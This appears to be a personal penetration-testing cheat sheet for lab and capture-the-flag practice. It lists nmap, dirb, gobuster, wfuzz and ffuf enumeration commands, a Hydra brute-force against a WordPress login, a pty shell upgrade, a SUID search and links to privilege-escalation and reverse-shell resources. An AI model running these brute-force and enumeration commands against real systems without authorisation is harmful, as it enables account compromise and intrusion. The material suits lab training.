nmap commands
nmap -sV nmap scriptleri listeleme
ls /usr/share/nmap/scripts/nmap --script "safe or smb-enum-*" -p 445 <ip>http server python3 and python
python3 -m http.server 8082
python -m SimpleHTTPServer 9000dirb commands
dirb <url>dirb <target-ip> -X .php,.js,.htmlDavtest command to control allow methods
davtest --url <target-ip>Search subdomain
wfuzz -u http://artcorp.htb -w /usr/share/wordlists/SecLists-2023.2/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.artcorp.htb" --hw 0
gobuster dns -d <target-ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt Curl commands
curl -X OPTIONS <target-ip> -v /bin/bash with python
python -c 'import pty;pty.spawn("/bin/bash")'Can be download linpeas, winpeas
https://github.com/carlospolop/PEASS-ng/releases/tag/20221009Hydra bruteforce
hydra -L users.file -P passwords.file 10.11.10.239 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.11.10.239%2Fwp-admin%2F&testcookie=1:Invalid username" -VFind suid bit
find / -perm -u=s -type f 2>/dev/nullffuf brute-force
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.98.228/customers/signup -mr "username already exists"Privesc
https://gtfobins.github.io/#Privesc Linux or Windows
https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linuxOSCP Notes
https://notchxor.github.io/oscp-notes/5-linux-privesc/4-2-linux-privesc/Reverse Shell Generator
https://www.revshells.com/